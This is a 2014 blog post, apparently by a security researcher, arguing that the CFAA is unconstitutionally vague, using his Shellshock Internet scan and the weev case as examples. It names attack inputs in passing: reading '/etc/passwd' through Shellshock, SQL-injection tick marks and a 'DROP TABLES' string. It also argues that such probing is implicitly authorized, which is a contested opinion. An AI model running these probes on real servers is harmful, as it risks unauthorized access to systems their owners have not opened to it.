Friday, September 26, 2014

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web happened. Back then, authorization meant explicit authorization. Somebody first had to tell you "yes, you can access the computer" before you were authorized. The web, however, consists of computers that are open to the public. On the web, people intentionally access computers with the full knowledge that nobody explicitly told them it was authorized. Instead, there is some vague notion of implicit authorization, that once something is opened to the public, then the public may access it.

Unfortunately, whereas explicit authorization is unambiguous, the limits of implicit authorization are undefined. We see that in the Weev case. Weev knew that AT&T did not want him to access that information, but he believed that he was nonetheless authorized because AT&T made it public. That's the tension in the law, between unwanted access vs. unauthorized access.

It would be easy to just say that anything the perpetrator knows is unwanted is therefore unauthorized, but that wouldn't work. Take the NYTimes, for example. They transmit a "Cookie" to your web-browser in order to limit access to their site, in order to encourage you to pay for a subscription. The NYTimes knows that you don't want the cookie, that placing the cookie on your computer is unwanted access. This unwanted access is clearly not hacking.

Note that the NYTimes used to work a different way. It blocked access until you first created an account and explicitly agreed to the cookie. Now they place the cookie on your computer without your consent.

Another example is Google. They access every public website, downloading a complete copy of the site in order to profit by other people's content. They know that many people don't want this.

Finally there is the example of advertisements, especially Flash/JavaScript ads with flashy content that really annoy us. This unwanted code is designed to annoy us -- as long as it gets our attention. (h/t @munin).

These, and a thousand other examples, demonstrates that "unwanted but authorized" access on the public Internet is the norm.

Figuring out when public, but unwanted, access crosses the line to "unauthorized" is the key problem in the CFAA. Because it's not defined, it invites arbitrary prosecution. Weev embarrassed the powerful, not only AT&T and Apple, but the politicians whose names appeared in the results. Prosecutors therefore came up with a new interpretation of the CFAA by which to prosecute him.

A common phrase you'll hear in the law is that "ignorance of the law is no excuse". For example, a lot of hackers get tripped up by "obstruction of justice". It's a law that few know, but ignorance of it doesn't make you innocent. Barret Brown's mother is serving a 6-month sentence for obstruction of justice because she didn't know that hiding her child's laptop during execution of a search warrant would be "obstruction of justice".

But this "ignorance of the law" thing doesn't apply to the Weev case, because everyone is ignorant of the law. Even his lawyers, planning ahead of time, wouldn't be able to figure it out. In my mass scanning of the Internet people keep telling me I need to consult with a lawyer to figure out if it's "authorized". I do talk to lawyers about it, including experts in this field. Their answer is "nobody knows". In other words, the answer is that prosecutors might be able to successfully prosecute me, but not because the law clearly says that what I'm doing is illegal, but because the law is so vague that it can be used to successfully prosecute anybody for almost anything -- like Weev.

That's the central point of any appeal in my case of getting arrested for scanning: that the CFAA is "void for vagueness".  The law is clearly too vague for the average citizen to understand. Of course, every law suffers from a little bit of vagueness, but in the case of the CFAA, the unknown parts are extremely broad, covering virtually all public access of computers. When computers are public, as on the web, and you do something slightly unusual, there is no way for reasonable people to tell if the conduct is "authorized" under the law. The very fact that my lawyers can't tell me if mass scanning of the Internet is "authorized" is a clear indication that the law is too vague.

The reason vagueness causes the law to become void is that it violates due process. It endangers a person with arbitrary and discriminatory prosecution. Weev was prosecuted not because a reasonable person should have known that such access was impermissible under the CFAA, but because his actions embarrassed AT&T, Apple, and some prominent politicians like Rahm Emanuel.


Lawyers think that the word "intentional" in the CFAA isn't vague. It's the mens rea component, and is clearly defined. There are four levels of mens rea: accidental/negligent, reckless, knowing, and intentional. It differentiates manslaughter (negligent actions that lead to death) vs. murder (intentionally killing someone). The CFAA has the narrowest mens rea component, intentional. That partially resolves the problem of accessing public websites: you may not be authorized, but as long as you don't know it, then your access is not illegal. Thus, you can click on the following link xyzpdq, and even though you suspect that I'm trying to trick you into accessing something you shouldn't, it's still okay, because you didn't know for certain if it was unauthorized. (Yes, that URL is designed to look like hacking, but no, I'm fairly certain it won't work, because the NSA has never had a 'cgi-bin' subdirectory according to Google). You can "recklessly" access without authorization, but as long as it's not "intentional", you don't violate the CFAA.

Lawyers think this is clear, but it isn't. We know Weev's state of mind. We knew he believed his actions were authorized. For one thing, all his peers in the cybersecurity community think it's authorized. For another thing, he wouldn't have published the evidence of his 'crime' on Gawker if he thought it were a crime.

Yet, somehow, this isn't a mens rea defense. You can read why on the Wikipedia article on mens rea. This is merely the subjecive test, but the courts also have an objective test. It's not necessarily Weev's actual intentions that matter, but the intentions of a "reasonable person". Would a reasonable person have believed that accessing AT&T's servers that way was unauthorized?

This test is bonkers for computers, because a "reasonable person" means an "ignorant person". Reasonable people who know how the web works, who have read RFC 2616, believe Weev's actions are clearly authorized. Other reasonable people who know nothing except how to access Facebook with an iPad often believe otherwise -- and it's the iPad users the court relies upon for "reasonable person".

If you are on a desktop/laptop, you are reading this blogpost in a browser. At the top of your browser is the URL field. You can click on this and edit this field. When presented with a URL like "http://example.com/?articleId=5", you know you can edit the URL, changing the '5' to a '6', and thereby access the next article in the sequence. Reasonable people who know how the web works routinely do this every day -- we know the URL field is there for exactly this reason. Ignorant-but-reasonable people who don't know how computers work have never edited the URL. To the ignorant, the URL is some incomprehensible detail that nobody would ever edit, and that if they ever did, it was because they were "hacking".

In legal terms, this means that the mens rea for the CFAA is actually "strict liability". Your actual intentions are irrelevant, because it's the intentions of the ignorant that matter. And the ignorant think anything other than clicking on links is unauthorized. Hence, editing the URL field is "intentional unauthorized access".

I have this fantasy that one day Tim Berners-Lee (the designer of the web) gets prosecuted for incrementing the URL to access the next article. In the debate about "how the web works" and "what does authorization mean", Tim will be refering to RFC 2616 which he wrote. However, he'll be found guilty because the ignorant people in the jury box, consisting of his 'reasonable' peers, thinks it works a different way. Tim will say "I designed the web so that people could increment the URL" whereas the jury would claim "no reasonable person would ever increment the URL".

What we have is something akin to the Salem Witch Trials, where a reasonable jury of their peers convicted people for practicing witchcraft. To the average person on the street, computers work by magic, and those who do strange things are practicing witchcraft. Weev was convicted of witchcraft, and nothing more.


That brings me back to my scan of the Internet for the Shellshock bug. The facts are not in doubt. I document exactly what I sent to the web servers. That I didn't intend to "hack" the servers and believed my accessed was "authorized" is likewise clear.

Some of my peers are uncomfortable, though, because the nature of the access is unusual. But they haven't thought things through. This isn't a buffer-overflow remote-code execution, where data becomes code contrary to the expectations of the programmer. Instead, it's code execution according to the intentions of the programmer. Shellshock is a feature whose defined intent was to execute code. Shellshock is fixed by removing a feature from bash that has been used for 20 years. That servers are misconfigured to run shellshock code doesn't make it unauthorized.

Furthermore, there is the "thereby obtains information" clause. If my command were "cat /etc/passwd", I can understand there'd be an issue. In the Weev cause, it's clear that the programmers intended for the iPad account information to be public, but it's clear in this case that nobody intends "/etc/passwd" to be public. But I don't use Shellshock to get the password file, I use 'ping' because clearly pinging is authorized -- because pings are a normal authorized interaction between two computers on the Internet.

If you want to claim that all "code execution" is invalid, then a lot of what we do becomes invalid. For example, our community routinely adds a tick mark ' onto URLs to test for SQL injection. That's technically code execution. By pasting strings, website programmers have implicitly authorized us to run some SQL code, like tick marks. It doesn't mean they've authorized us to execute all code, like getting the password file, or doing the famous "; DROP TABLES Students". But it does mean that they've authorized the principle of running code -- which is why we put tickmarks in URLs with reckless abandon. Heck, when websites are broken, we'll write entire SQL queries to get the information in our account that we believe we are authorized to.

At least, that's the narrow reading we've all been using of the CFAA: when they make a website public, and they've configured certain features (albeit without full understanding of their actions), then we feel authorized to use them. It's their responsibility to make thinks explicitly un-authorized, not our responsibility to figure out what's been implicitly authorized. If they put a password on it, we recognize that as "authorization", and we don't try to bypass the password even if we can (even with URL editing, even with SQL code). Conversely, when it's public, we treat things as public. We have simple criteria, "authorized means explicit" and "public means public".


I know that I'm at risk for prosecution of the CFAA, but somebody has to do this. Unless security researchers are free of the chilling-effects of the law, Chinese cyberwarriors and cyberterrorists will devastate our country. More importantly, the CFAA is unconstitutionally vague violating due process, and somebody has to defend the constitution. I can handle getting prosecuted, so I'm willing to stick my neck out.



Update: The point I'm trying to make about 'mens rea' is that it doesn't resolve the ambiguity over "authorization". Some people have claimed that the law isn't void for vagueness, because 'intent' clarifies things. It doesn't. All access is intentional, it's authorization that's the question. If I think I'm authorized, but the law disagrees, then "ignorance-of-law-is-no-excuse" trumps "I thought I was authorized", thus we are right back at strict liability. Only in the case of recklessly clicking on web links is there a difference. Anything more complex that technical people do collapses to ill-intentioned witchcraft.


2 comments:

  1. I hereby formally disqualify myself from acting as an expert witness in your trial by voicing my 100% support for your position Rob!

    ReplyDelete
  2. That's it brother. someone needs to challenge, we can not assume that everyone is tarred with the same brush! do not feed trolls. greetings.

    ReplyDelete

Note: Only a member of this blog may post a comment.